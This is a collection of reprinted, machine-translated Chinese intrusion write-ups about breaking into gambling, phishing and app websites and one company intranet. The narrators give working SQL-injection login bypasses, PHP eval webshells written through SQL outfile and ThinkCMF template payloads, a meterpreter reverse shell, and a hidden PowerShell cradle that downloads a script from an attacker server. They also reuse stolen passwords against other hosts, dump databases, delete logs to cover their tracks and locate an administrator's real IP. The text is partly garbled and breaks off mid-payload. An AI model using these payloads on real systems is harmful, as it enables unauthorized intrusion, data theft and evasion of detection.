getting the shell, I tried to execute the command first, but the command still couldn't execute normally. I tried to break through the disabled_function but failed At this time, change your mind and check the server configuration file/application/database.php of the ThinkPHP framework to get the MySQL database account Connect to the database Query backend administrator data But I found that md5 could not be unlocked, but I roughly checked the data in the database. I didn't find any data that was of great help here, so I didn't consider continuing to stick to the backend account. The main focus next should be on collecting information for the site administrator. First check the logging file /runtime/log/202107/05.log in the ThinkPHP framework I found that the system function was indeed disabled in the log At the same time, an important data that was ignored when checking the database was found in the log. —— The last login IP of the backend administrator Looking through the records a few days ago, I found that the last login IP was 101.78.*.*. I suspected that this was the IP address of the website administrator. After feedbacking it to the senior, I checked the IP and found that it was an IP from Hong Kong. I felt panic: This should be a V P N hanging The result is as expected The following work was deadlocked. After flipping through ThinkPHP's log, no login data of other IPs were found. The backend administrator account password was modified in the database. After logging in to the background, no useful information was found. There was only the management of some phishing articles Later, I communicated with a master. The master suggested checking if there is any useful information left in the pagoda. I found the data file of the pagoda panel in C:/BtSoft/panel/data/default.db and obtained the pagoda account information At the same time, I also checked the log contents in the pagoda database However, the password cannot be untie. At this time, you can reset the account password by overwriting the db file. However, this method requires restarting the panel. Due to our current situation, this method is difficult to implement. So my thoughts fell into a deadlock again. After sleeping, I woke up the next day and remembered that there would be a request log for the pagoda panel. So I found a large number of request information stored in json in C:/BtSoft/panel/logs/request/ Opening the log file that was earlier, there was indeed a breakthrough (it may be that V P N is unstable and suddenly hangs up during operation, resulting in leakage of the real IP) After querying 175.167.*.*, it was found that it was the IP address of Shenyang, Liaoning, and used online tools to roughly locate and feedback to the seniors. By the way, the website’s source code, database, and log files are packaged and collected, and finally deleted the request record we left during the infiltration Finished work Reprinted from the original link: https://www.cnblogs.com/yesec/p/14983903.html

1. APP packet capture and reverse cracking encryption algorithm Open the APP is a login box After catching the packet, the parameters were encrypted Using Jadx off-source code, it was found that there was no shelling or confusion. It was very lucky. According to experience, first search for keywords such as Encrypt, Decrypt, etc. and found that there is an encryptData function in Common.js Positioning the past, a set of encryption and decryption algorithms are written and placed here Put it in the browser console to debug, it's true 2. Find the injection point First test the injection Plain text: {'userName':'TEST'','passWord':'123456','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'} Password: QSXBDUSV0QpJkd5tWYR90SshkWzZFVipkWUNFcK1GZzpkeZVjWWJ2asJDZwxWRl5kUrRVMFtWZOBHWTVUMr1kWSZFV4tmRSBFbyIWcsV0YXRGbZdHcwEVTsd0T0J1RjFWNXNlMrBTUhZlbSRnTXF2SOVEVwZEbSBFczEWVxAjVLxmMUBHZzYVY0d1TYp0VhNDbXNFNsVVYQx2VWhkTX50U41WW3JVbNlmTuNFR4VVYSJVVUF DbGJlTWhVUxFTVhZHcXNVMspnVoBnbTlFcxY1QoBTWvBHMR1EbXJVc4VUZw0EbUBXOtFmSWh1TYZUbltEasdFW1ATTpxmMkBHbwE2cKpWW1okVilGatNFc5UVYWRGMZFTSW1kaa52UEhXVhplUsR1dwsWYOhGWTBXOVFmUxITWyI1VNpGcuJFSOdVYzw2VTVnRW1kVatWVzx2aOpkTsdFMaVlYVxmbWlXTX10SshlW Result: App returns exception Plain text: {'userName':'TEST''','passWord':'123456','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'} Password: JdFMQJVRDlmQ2l3ahJlWXFmaox2VxAXVhBFbH5UeJd0YPVjMZNHcsJmSOh1UUFzalJlUxQ1MxsWZOxGWRFXNr1kRSxGV5NWbhpkWUNFVGdkY4NmVZBHZYFmSa52VZZUbNtEbyQFcGZlYphWbTVHbWF2Msd1UWhWbl5kVUJVcaZVY2B3VTpnWxIVYahVT0xGMjpkTWRFc50WYKhXbRllVXZVMjZVW1xmeSlGbyQGcsVUTCB3RU lXRrFWTkh1Uxx2aOpEbtllM41WTqxmbWRnWxQ2QoZ1VwRGWhpEaI5EVxUFZWB3VTJzaVFWaahkY510VldVMtZlNsRlYK5EWTREcGNWNwITWyZleWpFbyIWcsVkYDhmVaZVNw0UasJDZwx2aNZlUrRlNsVkVOxmMiFHbwE2SOpWWZVDMNpGatFVdsBzYKxmbTVnRW1kVatWVzx2aOpkTsdFMaVlYVxmbWlXTX10SshlW Results: App returns normal Plain text: {'userName':'TEST'or'1'='1','passWord':'123456','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'} Password: k0VwAlUFNUaCZXerFWRspFcOd0VhZlbTBXOVFGMJpWW3VzaipGetdVdsBzYK5kVUZjRGZFUkhFV2ETVlJEctRVeVVkVPpkeaFHbr5kSOZVWzZkeWhGbyQGcstGZhhmVZl3bVFGUsdVV0p0RhtUNXdFckhVYKZlRhZTMV5kRw1mVwlTbhpkTuZFSwxGZ4BzVTpHbwUlTsJjYxxWRiNEaWplVWpnVoVzVPhkSXF2Msd1U3V0ah1kSUFVc4B DZKB3VTJzaVFWaahkY510VldVMtZ1MKV0VaxmMkBHbFVGMNZFVxYFbhpkWUNFcK1GZzpkeZVjWWJ2Vwh1T0xGMjpkTrd1dsRlYqR3VOhFbWFmdwd1UzpURXxmVsRleJdVYzw2VTlXVGJ1Twh1UVFTVhZHcXNlcwBTTphGbUpXTHF2Q1c1U6xWVltEb6lFVxsmYK5kaZVnRW1kVatWVzx2aOpkTsdFMaVlYVxmbWlXTX10SshlW Results: App returns normal At this point, it can be judged that the login point is an injection, but the result is always "the username or password is wrong", which means that it is used ' or '1'='1 Based on the return result, the logic code at the login in the backend may be like this userInfo='select * from userinfo where username=userName'; userPass=userInfo.password;if (userPass==password){return 'Login success'; }else{return 'Login failed'; }Constructing a universal password through Union injection can cause any user to log in. The test process is as follows First use order by test, and know that the number of fields is 9, construct the payload # Since the target server has filtering, here is a simple pass plaintext: {'userName':'TEST'union/**/select/**/null,null,null,null,null,null,null,null,null,null,null from dual-- ','passWord':'123456','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'}ciphertext: JdFMQJ VRDlmQ2l3ahFkaipkTqZFdKdVY2B3VTFDb6ZFaw52UZBHbNtkTFRFcWtWZOJkehVUMrVmTwdFVzwGbh9EaYZVc1UkTKxmMUBHdyYVYShkY0xGMjpEbulVe3dlYrxmMiFHbwEWMjZ1V1AXVipkTYNFRaZkTOJVMURDbGJmSaR1UEp0RiNlSqlFMwBTUNx2VSFHbr5kSOx2Vzg3RTdlVIJWevxGZ0E zVTpHbwE1TkhkTwVDMkBTTVRVNsVVYQx2ROlXSHN2T1ITWzBHbSpGZuJFdsBzYK5kVUFjVrFWTGR1UwlTVhBTSql1d1smYqhXbXXTtR2SOVEVwZUMWhmWuNVSwZFZHFzVTJzawUVYkhkYJpFblVDMXNlesVVYPZEVVZTMVVmRwd1UysGMRFGbY9UeZxWZPhmVXNDcwEVTsdVUUhXRkJkTrl1baZ 0UhR2RNlXSXVWYkV1U6h2MWtmVIVGRKJzYXVTbZpHZzIVaGRlTIhHMjRDZGpVMoNTUp5kbWVnSyM2MktWW4VleS1kTIVGWSdFZ040aZpnWsJWaONDZIp0VNFTSERFe5cVZNJkaUhFcxM2VKpXWykzVhxkWI5UeJd0YxMmRaVnRW1kVatWVzx2aOpkTsdFMaVlYVxmbWlXTX10SshlW Results: App returns successfully Since Oracle must also test the field data type when conducting union query, the corresponding field data type must also be tested. The final result is as follows # Note that I modified password to 123 here to test whether the universal password constructed by Union is feasible: {'userName':'TEST'union/**/select/**/1,'123','123','123','123','123','123','123','123','123','123','123','123','123','123','123','123','123','123','123','123',1 from dual-- ','passWord':'123','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'}ciphertext: QSXBDUSV0 QpJkd5tWYB1UdsBTTXFTbZBXOtFmSWh1TYZUbltEasdVevBTUNx2VSZTMF1kcSVFV2Ezah5EZYdVc1UUZWBXbUBzaVFGUsJTYYBnRkNXMXNlesVVZppERiRnUXFmdwd1UyZleWpFbuNFdsBzYK50aWBDMFZFUoh1Vzx2aOpkTrl1cKxWTpJlbTREeVFmRwd1UysGMVFGZIJWSaZFZzpkaXJDaYJm SOh1UEVDMkBzatR1MSpXUOxGWTBXOVFGMJpWW3VzaipGetd1ROJDZHFzVTpHbwUlTWhlUxhXVNpEbyQFcSpWTpJkbUVnTHJWYGpXWyAHMR1EbXVFWG1GZLh2aXFjWVJmSaR1UUBXMkNHarZlNsRlYK5EWTVTMVVmRwd1UysGMRFGbY9UeZxWZPhmVXNDcwEVTsdVUUhXRkNDZWdFeJFjUKJFWPR nTXJ2QOZFV650Vl5EbYJlNwBzYqxGWUVjVrV2SONTW1ETVlZEcuNleOdVZOxGWSZDcwMmashFV1Y1altkTzkVNxUVZGBnbTpnTXVmTshlU2AHMjZEcIRFe5cVZNJkaUhFcxM2VKpXWykzVhxkWI5UeJd0YxMmRaVnRW1kVatWVzx2aOpkTsdFMaVlYVxmbWlXTX10SshlW Results: The prompt is a weak password (indicating that this method is feasible) Next, change one field and one field to determine which field corresponds to the password field. The test results are as follows # Note that I changed password to Ceshi123@@@, it is no longer a weak password Plain text: {'userName':'TEST'union/**/select/**/1,'123','123','Ceshi123@@@','123','123','123','123','123','123',1 from dual-- ','passWord':'Ceshi123@@@','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'} Password: k0VwAlUFNUaCZXerFWUPtEbIp1cWRlYKpFVTBnStR2cKpXW1olVitGbyQGcsVUZOJ1aUFTRrVmTwh1UFFzaNplUWRFerZkUQxmMiFHbFN2VkxWW3BHMR1EbH9EdSd0YhVzVTJzawEVYW5mU050VhtkTFRFcGxmUQB3MhVVMwY1S sJDVwR2MWFGdX9EWKdVYzw2VTRDbVFGUsdlVI50VONFetl1dS1WTp5kbTREeVFmUSVFVxwmRS5kVYFVcxUVY2B3VTFDb6ZFaw52UZBXMWNEawk1bwBTUNx2VSFHeFVGMNxGVwlTbhpkVY9EWG1WZLhGbXhVNw0UasJDZwxGMhNnSqlV NKZlYphWbTBXOVFmVkBTWxkkVNpmWuNFR4VVYCZVVVJUNrFmToNTYIZUbldlSUVFc50WYKRXbTpXSHd1TOpXWvp0aipkTYNFRsVEZ310aZ9mWGNVYkdUT5l0VlFGZVNFNkhVZLBHWTVVMrJ2Ms52U2wWRW5UNyQWNwtWZKJlVUVHZYV 2Swh1UVFzaiNDbuNlQKVlUSBHWTVVMFN2bKpXWzVTRNtkTzkVNxUVZGBnbTpnTXVmTshlU2AHMjZEcIRFe5cVZNJkaUhFcxM2VKpXWykzVhxkWI5UeJd0YxMmRaVnRW1kVatWVzx2aOpkTsdFMaVlYVxmbWlXTX10SshlW Result: Prompt login successful After bypassing, I found that the program had an exception Carefully observe the returned data, including username (username), staffId (employee number), email (email), staffName (name), tel (mobile number), and mobile (mobile number). However, these data were just constructed by myself. Here you should need a real user information for the subsequent login process. Fortunately, there is still a place to obtain real user information 3. Breaking the username by forgetting your password The app also has a function of forgetting password (usually you can explode the username here) You can use the function of forgetting your password to determine whether the username exists. Here I just ran the dictionary and many usernames came out. 4. Cracking the SMS verification code Naturally use these usernames to log in using SMS verification code Get the verification code, then decrypt the data packet, and the surprising discovery returns the user's basic information Retest payload based on login, and the final result is as follows Plain text: {'userName':'TEST\'union/**/select/**/staffId,\'Qwe123@@@\',\'userName\',\'Qwe123@@@\',\'mobile\',\'mobile\',\'email\',\'865166023309431\',staffId from dual -- ','passWord':'Qwe123@@@','osType':'android','osVersion':'5.1.1','appVersion':'20.06.04','loginType':'1','model':'V1938T','brand':'vivo','imei':'865166023309431','version':'new'} Password:

0x00 Introduction The red and blue confrontation is undoubtedly a continuous game process. With the continuous offense and defense in recent years, the fight has been fought one round after another, and the web vulnerabilities have decreased sharply, and social worker phishing has obviously become one of the mainstream attack methods. 0x01 Disclaimer Please be sure to read carefully and fully understand the following terms: 1. Any articles shared by this official account are only for legally authorized enterprise security construction and personal learning behaviors. Any organization or individual is strictly prohibited from using it for illegal activities. 2. When testing using relevant tools and technologies in this article, you should ensure that the behavior complies with local laws and regulations and has obtained sufficient authorization. 3. If you have any illegal acts in the process of using the relevant tools and technologies in this article, you must bear the corresponding consequences at your own discretion, and we will not bear any legal or joint liability. 4. It is strictly forbidden for any organization or individual to make illegal profits in the name of this official account. 5. All sharing tools and technical articles in this official account are strictly prohibited from public sharing without authorization. If the above prohibited behavior is discovered, we reserve the right to pursue legal responsibility and you shall bear any consequences caused by the prohibited behavior. 0x02 Go through the regular operation After getting the target -- Asset collection -- Find soft persimmons -- Try to cook After obtaining the target unit information, through Qichacha domain name and enterprise structure, it was found that there was no foreign investment, and there was only one superior unit company. Looking for a subdomain, there are no assets available (virustotal.com, fast and easy but inaccurate) It is also empty to see if there is any information available through the qaxnb asset mapping platform. Through multi-point ping, domain name resolution and other operations, we find that they all point to Alibaba Cloud After a set of processes, there is no goal to manage except for an unchanging official website (domain name resolution points to the cloud, and I don’t have the mood to dig deeper). Finally came to the conclusion: I actually am the soft persimmon 0x03 All roads lead to Rome If the web cannot be moved, you can't go through the regular operation. Start pointing the finger at the official account, mini program By testing the application of the mobile terminal, observing the request address and the content of the packet return, the real IP address was finally found, so the official website was not on the cloud. Through the IP, the full port scanning was found to exist in H3C network management equipment. You can roughly guess that the IP is an export IP. By scanning the full port information of the five IPs in the front and back, I was overjoyed to find several application systems. They looked like soft persimmons, and I felt that success was right in front of me. I was about to hit the soul and hit the yellow dragon. I was a little excited to think about it. Hehehehe As a result, although there are some loopholes, none of them can be moved, and getshell failed Sure enough, the soft persimmon is me However, we are all the King of Guns who do offense and defense, and we will not give up until the last second. When we penetrated a certain system, we found a big baby (online manual one-to-one WeChat QR code) 0x04 I love target customer service After adding the target customer service, my excited heart and trembling hands all imply that the two of us would be as beautiful as a first love. When we meet fire, something will happen tonight. Hehehe Through the time intervals of the conversation and the short words of the reply, it is not difficult to see that she is perfunctory to me in vain for my sincere heart. But as the saying goes, "I will be brave and starve to death." I concluded that she was not caring enough to me, so I decided to be a brave and good man. Sure enough, under my sentence: "Are you sure? Are you really treating me?", under the attack of two "?", she changed her mind and clicked on my big baby. I also successfully entered the intranet of their unit. 0x05 Details determine success or failure By collecting process information and port information, it was discovered that Kingsoft Antivirus exists in the intranet, and the access was found to be v9 (uploaded and fixed) The details are here. When I was testing the official account in front, I found an account password and recorded it casually. After analyzing the rules, manually reorganizing several account passwords and using them to collide with Kingsoft Anti-virus. Another shot of the soul was hit, and it was a precise blow and successfully won. The ancients said: "If you have the internal network, those who have centralized control will win the world." At this point, although it is enough to make the unit's intranet fall, it is not perfect enough. I always feel that something is missing, so I have to continue to rush. Through the assembled password, I took the H3C network device mentioned above and found that I directly became a network administrator, and I understood all the routing directions and network strategies. Hehehehe The careful master has actually discovered that there is vmware (webtitle that appeals to a certain picture) in the intranet, so I definitely can't let her go, right? It was successfully obtained through historical vulnerabilities and found that the core production system was deployed, but the historical vulnerabilities were not repaired. getshell -- take data.mdb -- decrypt -- get cookies -- enter the background The others are all fragmented things, and they don’t have much technical content. I believe that the masters don’t like it either, so let’s stop here. It’s impolite to fight again. 0x06 Attack Route 0x07 Last Words There are any unreasonable or ununderstandable content in the article. Welcome to comment and let us communicate and make progress together. There are illegal or infringing contents of the article. Welcome to point out that this article will be deleted immediately after verification. Reprinted from the original link: https://mp.weixin.qq.com/s/cixtFPn__YPe1XtpcTE2Ow?scene=25#wechat_redirect

1. Cause There have been many cases of illegal spinach gambling in China in recent years. This time I will explain how I penetrated the next illegal spinach website. This infiltration was purely luck + the negligence of the webmaster, which can be said to be the destruction of a thousand-year-old embankment in the ant nest. In order to ensure readers' understanding, the intruder's identity is specially used to document it! 2. Scouting and collecting information Open the target site and found it was a spinach website, and then started collecting information. Whois information query of the domain name learned that the domain name comes from Western Digital Here I use the webmaster's ping tool to see if there is a CDN used and query the server room location. From whois results, I learned that DNS Pod is using DNS Pod, but those who have experienced it know that general large IDC manufacturers have their own DNS, so the agents use DNS Pod It is obvious that this domain name was registered on the agent. I originally prepared a social work domain name, but it was meaningless. Others still used the same thing after they came back after parsing it. F4ther wrote an article before saying that it was a honeypot and fishing to hijack the safety pulse. But it's too troublesome, just skip it and penetrate it directly. I saw that the URL is home/Change/AlipayInfo/alipay/WeChat.html. My first hunch is the program written using the ThinkPHP framework. In order to verify my guess, I specially entered the address to see if it reported an error. Generally, the version + physical path will be displayed when reporting an error to ThinkPHP. As a result, if you have a look at the point on the picture, you can get the following information 1. This site uses the ThinkPHP3.2.2 framework. 2. Physical Road Force C:\WWW\pcdd\pc 3. This website does not use CDN 4. This website server is overseas (Canada). 5. There must be loopholes in this website. 3. Start the battle I found a direct SQLmap test, and the result is as follows. It is protected and directly blocked by the wall, which makes it impossible to continue. Connect to a VPN Look again, if you can't find a way to protect it, directly access the ping IP 47.xx.xx.xx, and find a phpstudy probe In phpstudy, the default database password is root, so we start to try weak passwords I found out that he was a weak password. So I'm visiting 47.xx.xx.xx/phpmyadmin. Unfortunately, it was walled again, which means that this firewall is a bit of a waste. Change the node and log in directly. Later, use the SQL statement to export a sentence Trojan, log in and click SQL, and then execute the statement select '?php @eval($_POST[1])?' into outfile 'C:\/WWW\/pcdd\/pc\/log1.php'; The purpose of using double slashes here and one slash is inverted is to be afraid that it will not be able to parse the slashes directly, and then it will be blocked again because of executing the SQL statement. After that, I directly used the kitchen knife and changed the node. Because I executed the SQL statement, it must have been blocked, so I changed the node directly. Remember, at this time, you will be flipping the directory in the shell. The 100 nodes on the wall are not enough for you to flip. You can directly execute the statement to increase the authority, and then connect to the server. The webmaster here fixes the vulnerability, and the Trojan naturally no longer exists and cannot be reproduced. However, the webmaster did not delete my account. found that he uses Alibaba Cloud's rds database, and his password is quite complicated. IV. Summary 1. His website uses cloud database site database separation. First, it is safer, and second, it is better to process data, but because it neglects the weak password of the local environment database, it is invaded. 2. Details are really important, such as information collection. Many people have been staring at the target station for a long time and have not gained anything. At this time, you might as well take a look at its windows and back doors. This article directly accesses the IP and discovers the environment configuration and probes. Only then can you come in so smoothly. 3. The basics are very important. For example, you don’t know the default password and default address of the phpstudy environment. What if the default password of phpstudy is something else? I don’t know that the default permissions are system4. Be careful when doing things and must minimize the workload. For example, when executing a sql statement, it is very likely that phpmyadmin will be parsed into C:WWW or something, so it is best to bring double slashes backslashes with you every time you test them, and it will not have any effect anyway. For example, if you want to flip the directory, you will definitely be walled. At least one minute will be wasted to change nodes. Friends who have done public tests know that public tests are racing against time. So I directly raised the authority in this case due to the firewall. 5. Don’t be lazy when building your own website. Make all permissions perfect and minimize the risk of being hacked. Reprinted from the original link: https://mp.weixin.qq.com/s/3y894HT1uBBGdifbIToQZQ

On a sunny night, I was excited to walk on Twitter, and suddenly I found that the following recommended follow is such a business card of xxxx video. This, this, this, this, I am a serious person, I don’t know why Twitter pushed these to me. This must be done, open the promotion link, and download the app. This app gives people a familiar smell as soon as it is opened. It seems that it is likely that it is opened by TP two. Register a mobile phone number, fiddler to catch and modify the package, but the content is actually more eye-catching I caught the packet and obtained the url and found that this was just thinkcmf? I smiled lewdly and thought that I wouldn't have taken it off. There were so many rces at the front desk, even if there were dogs, I could do it in seconds. However, I was quickly slapped in the face by reality. Execute POC:payload1: /index.php?g=apim=Oautha=fetchcontent=phpfile_put_contents('pass.php','?php @eval($_POST[1]);')/php payload2: /?a=fetch;templateFile=public/indexprefix=''content=phpfile_put_contents('pass.php','?php@eval($_POST[1]);')/php payload3: ?a=displaytemplateFile=%3C?php%20file_put_contents(%27m.php%27,%27%3C%3fphp+eval($_POST[%22X%22])%3b%3F%3E%27);die();%3E and read any file: /?a=displaytemplateFile=data/runtime/Logs/Portal/YY_MM_DD.log Finally, a m.php one-sentence Trojan file will be generated in the directory, and of course it can also be written as other payloads. The operation is as fierce as a tiger, and when you look at the file 404, will it be cold? Don't worry, in addition, this app also has SQL injection : injection point 1: /index.php?g=Appapim=Videovideoid=1 Injection point 2: /index.php?g=Appapim=Autha=indexuid=128889token=b69cda34dff2fa978a94b5583e7f5c9a The injection is also cool. It seems that I want me to take out the 0day rhythm? Forget it, let's bear it. After some research, the details will not be posted, and a thousand words are omitted here. It's all about tears if you say too much. Finally, phpinfo was released, with payload above version 7.2: /?a=fetchcontent=?=phpinfo();exit();This is not a step closer to the shell, and then see that disable_functions is disabled so many. I tried writing using the assert function here, and thought it was done, but the result was still returned 1 @assert function does not work, here you can try to read file file_get_contents and read database configuration file When I continued to read the config.php file, I suddenly remembered that when I downloaded the app, it was placed in Alibaba Cloud Oss. It is logical that its configuration file should have Alibaba Cloud key and id, but the reality is so cruel after all, that I didn't even see the letters aliyun. There is nothing to read in some configuration files, and the database and redis cannot be connected externally. So I plan to write a shell and flip it carefully, and try to use file_put_contents to read the file. It seems not possible. Is it because of a parameter problem? File_get_contents can read any file, or the directory cannot be written? Trying to write it in /tmp/1.txt also reported the same error. I thought that php also needs other functions to write files, so w3school flipped Write 123 to i.txt, and successfully write the file Try to write a sentence to php, and it prompts that the template does not exist. What should I do? I saw that the shell was obtained. Look carefully at the fwrite parameter. W+ is to open write and r+ is to append. Do I want to write one character by one? That's right, it's just to write one character to one character.a=fetchcontent=%3C?=@$fp=fopen(%221.php%22,%27a+%27);%20fwrite($fp,%27%27);exit(); Finally getshell Bypass command execution and rebound shell Then pack + take off your pants mysqldump -h127.0.0.1 -uxxxx -p

Get the target site page Prepare to give up before it even started Then let's see a points mall in the upper right corner. I clicked in with a sad heart I saw this page and slammed the door and went out to smoke for ten minutes [Don't ask why I didn't do it before Start collecting information Get this point store and put the domain name into fofa After getting the real IP, I found the Baota backend login panel Then use the domain name/ip to scan the directory [Which is the super large dictionary of Yujian] and look at the language bar to check it. I don’t know what script language domain name is followed directly with index.php [with pages], index.jsp[404], index.asp[404], OK, please contact php to get the background If there are very few pages like this, try your luck to find features to try Search in fofa Many pages show onethink, and then search on Baidu It is confirmed that this framework is and is developed based on thinkphp [There is an idea here : When we use the tp framework vulnerability to attack, if it is not successful, then we can use the found cms for code audit. Based on the fact that we have found the Baota login panel above, we can audit any file and read the Baota username and password, plan the task getshell] Use the tp vulnerability scanning tool to obtain POC The debug error was tp5.0.1 and searched for it. I found the log path. I tried to use the log inclusion but failed. Later, I found that his logs would be cleared when they reached a certain number and the phpinfo page would occupy a certain kb. So I had to clear his logs through burp and then convert the URL encoding to?phpphpinfo();//See [Vulnerability Summary File Inclusion] When sending send, the log file will disappear immediately after not displaying it in burp. At this time, look back at the initial POC. When the POC is successful, there will be debug information below. So we focus on Raw when the execution is successful, the following information will be displayed to extract key features Extract key features and search in Raw So if phpphpinfo(); is included, these two features will be repeated. The operation just now will be written to the log to catch the packet and convert the url's %3C?php%20phpinfo();%3E into php phpinfo(); Please note here that when its log reaches a certain amount, it will be cleared and cannot contain our malicious code. When we write phpphpinfo(); When we write phpphpinfo(); When we send it, we have to access the log to see if it exists?phpphpinfo(); I tried it three times here. It is not a problem to successfully include the feature (successfully included). The remaining getshell is not mentioned. It is too simple. As long as it is included and executed, getshell is not a problem. Reprinted from the original link: https://mp.weixin.qq.com/s/vE5QQx0FI_0OWVQ-6Uc9xg

Preface I like watching movies but like to have sex for free, so I often watch on some movie and television sites, and occasionally some lazy ads pop up. Recently, I haven't updated the official account much, so I just found an ad that lazy to make P. Since the scale is relatively large, I am serious in coding. Simple summary Lazy Video---Cite the playback source of external x stations 2. Choose X----The backend is all messy introductions of photos from cities and Baidu, fake 3. Make an appointment----Spinach game, guide betting through induction Is this aroused? I am posting a backend data Practical combat experience I found the background through domain name search, xx entertainment, and wall-mounted a wave of source code. I found similar source codes and built tutorials. The IP of the site leaked. The general site demonstrations are accompanied by demonstration account password backend and various fingerprint features. Through the fingerprint and default account password of the demonstration site, I found a batch of sites of the same type. Basically, I used the color lazy video to guide the play spinach. background lottery presets, all scams. I hope to share this article to your color lazy friends. In the early stage, I found the method of finding the source code to find the fingerprint of the demonstration site. There are also some sites, which is the normal penetration method. First, register an account and see the prompt that the user name can be customized and directly put on the xs code. It is a waste of money, and the background is difficult to trigger. The background is difficult to trigger. The user display in the background is like this, and the management clicks on the user details will trigger Also, it is basically fish-raising guidance, small withdrawal, large amount of obstruction Finally, the statistics of 3k multi-person small platform found the approximate location of the administrator Reprinted from the original link: https://mp.weixin.qq.com/s/IIyt-m1ul0UPXvocmwCfag

0x00 Introduction I was bored and I found a spinach online for a simple test and took notes. The big guys squirted lightly. Please advise if there are any shortcomings. 0x01 Weak password Visiting the website is a login page. Without the verification code, bp is directly enabled. The weak password admin/123456 is successfully exposed and directly enters the background. 0x02 Inject and get permission I looked through many functional points, found the upload interface at one functional point, and tried to upload the file, but found that it could not be uploaded, so I added a whitelist. Choose to give up and continue looking. Adding single quotes to a certain http://url/GroupMember.aspx?gid=parameter will directly report an error. Isn't this coming after SQL injection? Just do it and directly SQLMAP. Found as MSSQL and DBA permissions, directly --os-shell Online MSF Already obtained ordinary permissions, the next step is to launch msf to increase the rights. msf generates a powershell script and places it in the website directory. msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f psh-reflection xx.ps1 Vps enable monitoring Use powershell to go online sessionpowershell.exe -nop -w hidden -c 'IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/xx.ps1'))' If you want to execute powershell through url splicing stacking, there will be a problem, which is the single quote closure problem. We can encode the powershell so that we can bypass the single quote problem. Here is a good website. https://r0yanx.com/tools/java_exec_encode/elevation of rights The session has been launched, and the next goal is to obtain system permissions. Fortunately, getsystem can get system permissions directly. If you need to raise the rights, the Tudou Family will recommend the promotion of rights. The success rate in actual combat is very high and there are many server versions that will affect it. Migrate the process to prevent the process from falling off. Remote login to the server I found that the server opened port 3389 because it has system permissions and is a 2012 system. If the plain text password is not captured by the version greater than 2008, I will directly modify the adminnistrator password. (It is not recommended to directly modify the administrator password in actual combat) Use hash to log in to the administrator account remotely Because it is Win2012 that cannot obtain the plain text password, it is a bit inappropriate to directly modify the administrator password. Try to log in to the machine remotely by getting the administrator NTLM. (It's not the same one, it just provides one idea) Remote login to RDP using hash, you need to enable 'Restricted Admin Mode'REG ADD 'HKLM\System\CurrentControlSet\Control\Lsa' /vDisableRestrictedAdmin /t REG_DWORD /d 00000000 /f //Open Restricted Admin modeREG query 'HKLM\System\CurrentControlSet\Control\Lsa' | findstr 'DisableRestrictedAdmin' //Check whether0x0 is enabled means that REG ADD 'HKLM\System\CurrentControlSet\Control\Lsa' /v DisableRestrictedAdmin/tREG_DWORD/d00000000/f//Open RestrictedAdminmodeREG query 'HKLM\System\CurrentControlSet\Control\Lsa' | findstr 'DisableRestrictedAdmin' //Check whether0x0 is enabled means it is enabled Successfully utilized hash remote administrator desktop 04 0x03 Others In the early stage, I found that port 1433 was open, so I looked for the database configuration file and logged into the database. I looked through Fofa and found that there are quite a lot of assets, and many of them have open port 1433. I guess there will be websites deployed by the same person. I tried to use the obtained password to blast the port 1433 of these assets, and successfully hit several databases, all with sa permissions. Finish. Reprinted from the original link: https://mp.weixin.qq.com/s/kj55hbZMC9jF6xmbzXWu4whttps://xz.aliyun.com/t/12501

1. I accidentally found a spinach site and then tested it. The idea is as follows: Since it is a spinach site, users will definitely register, otherwise how can I charge money? When registering a page that interacts strongly with users, the possible vulnerabilities may be as follows: SQL injection: If the account information entered by the user is used directly to write or query the database without filtering, there must be sql injection xss: the personal information entered in the input box will be displayed on the user's page; at the same time, the administrator must have permission to view the user's personal information in the background, and there may be storage xss here; even if it is reflective or DOM xss, since such sites have customer service, you can find ways to trick customers into clicking on links to achieve the purpose of stealing cookies or other purposes; Parallel overright rights: When the user logs in, checks certain pages after logging in, and then catches packets, if there are similar id fields, you may see the information of other users and even administrators by changing the id number CSRF: modify the account information, such as password; or modify the email address, and then modify the password through the email address; Payment vulnerability: catch the packet and change the parameters, causing 0 yuan to pay 2. Follow this idea, regardless of one of the three or seven or two, go to the tool to try the registration page first, and the result is as follows: 2 high-risk xss are found; (1) Let’s look at the second one first: After changing the prompt parameters to the payload of the detection tool, the page is as follows: your payload is actually displayed on the page without any filtering, so I’m so happy; Since the payload itself is inside JS, the script tag was not constructed at the beginning, but directly used a payload like '19736%0a',}%0aalert(666);%0a'. The purpose of the payload is to expose alert(666) directly to the original script tag in the background, but it was not possible to try many of them repeatedly. I could only adjust my thinking and reconstruct the script tag. This time I succeeded, as follows; it means that this xss did not have a false alarm; The other one is in the cookie. If the sessionid is changed, it can also appear directly on the html source code of the page; similar to the first one above, you can construct script to execute your own js code; however, since you don’t know the background source code, you cannot determine whether this is a storage-type xss, and you cannot trick others into clicking through the construction of the url. I personally think it is not very meaningful, so I will not verify it here anymore; Since it is not possible to log in to the background, it is still uncertain whether other xss is a storage type. We will not continue to verify other xss vulnerabilities at this stage; (2) The login interface captures packets, the user name and password are actually transmitted in plain text, WTF. After letting go, I caught a new package and put it in the repeater to try: there is a field captcha in it, which is the verification code. After deleting it, the server will execute it anyway, and it will not prompt that the verification code is wrong, but the user name or password is wrong, which saves a lot of trouble; first use the correct account to test it, and find that the returned status is Y, everything is normal; Then start trying various SQL-injected payloads with single quotes, double quotes, brackets, ') or 1=1 -- qwe and other SQL injections, and the return is as follows: The string of native codes on the right is : "Please enter 4-15 characters, and only English letters and numbers can be entered"; it seems that it is intentional to filter, only letters and numbers can be entered, and no special symbols cannot be entered, and there is a high probability that SQL injection does not exist here; (Some website front-end pages also explain it, and it is actually checked on the back-end server side, not using JS to check on the front-end, and it is not possible to change the fields after using burp to catch packets) (3) Parallel/vertical 